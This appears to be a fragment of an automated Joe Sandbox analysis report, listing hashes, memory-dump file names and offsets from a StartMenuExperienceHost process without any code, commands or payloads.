                                                          • Instruction ID: 403ca7bfa9161b6979fc50fc33bbdc22017d589816ee0d691c99e9919a7102a3
                                                          • Opcode Fuzzy Hash: ec50c2690805efd610205068e9c3666e32cb9877ae0f2e6b1f388e07eedf2dd4
                                                          • Instruction Fuzzy Hash: 21D0A77594E9844FCB5A9735C8A8C507F50EF6B21034540ECC00A8F1B3D925CD49C700
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B794000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B794000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b794000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction ID: cc7bac2f6e103f3872257f5e93697b5c0beaa2769d3d0bda17c019a4cde01744
                                                          • Opcode Fuzzy Hash: 104acc72f31d9d09c7afd7aed4cdc5b30d692872643904b6d98eec7ee4f3d1b7
                                                          • Instruction Fuzzy Hash: EAC04C11B5A96E06E67872B935921E8B040DB49210B461AF9E41CD71A6EC8D5E9102C5
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 31e668ce6111303d3c648c45381bfc4cd6f488d9990d3e3ae62346c21e55579d
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 99C00205F5B75F01E86571AA58B60AEB140DBC4A25F921273D50D821B1988E22D54196
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 014d798b6d36322f39b9c860b9ef3808481d02ed10de65713d785253ca219bc5
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 15C08C3051190E8FC908EB28C88480433A0FB19200BC200D0E009C7170E259DCC2C740
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6bd0e51e27cebbb50ed940f093ff9efd1b382d162c2c5dcb05f47d845c5c1fdb
                                                          • Instruction ID: 4b46869c1d81cd14e84b8823740183c91f90104ffbdd72f33958d6c1cd02e398
                                                          • Opcode Fuzzy Hash: 6bd0e51e27cebbb50ed940f093ff9efd1b382d162c2c5dcb05f47d845c5c1fdb
                                                          • Instruction Fuzzy Hash: 86C08C00F18C1E8AF32A72440432A7D0403AB80B04F808270E00FCBBCECE0C2E020287
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 036e8af56f23f0f284f01f510b383e4077dfe8aa50ea0e621eed4e322330a2b4
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 6AB01200E5750F00E82431FA0CE20A5B040DB44110FC20271D40C411F198CD12D40282
                                                          Memory Dump Source
                                                          • Source File: 0000001E.00000002.1875074652.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_30_2_7ffd9b770000_StartMenuExperienceHost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: aa4335d639f11fad10cfd9083291069f188472a50696d56f4d975dc6008051bc
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: F1B09222E1A35D42F72492A084A12FA71529F44710F5AC6B2900FA74E18C682B899681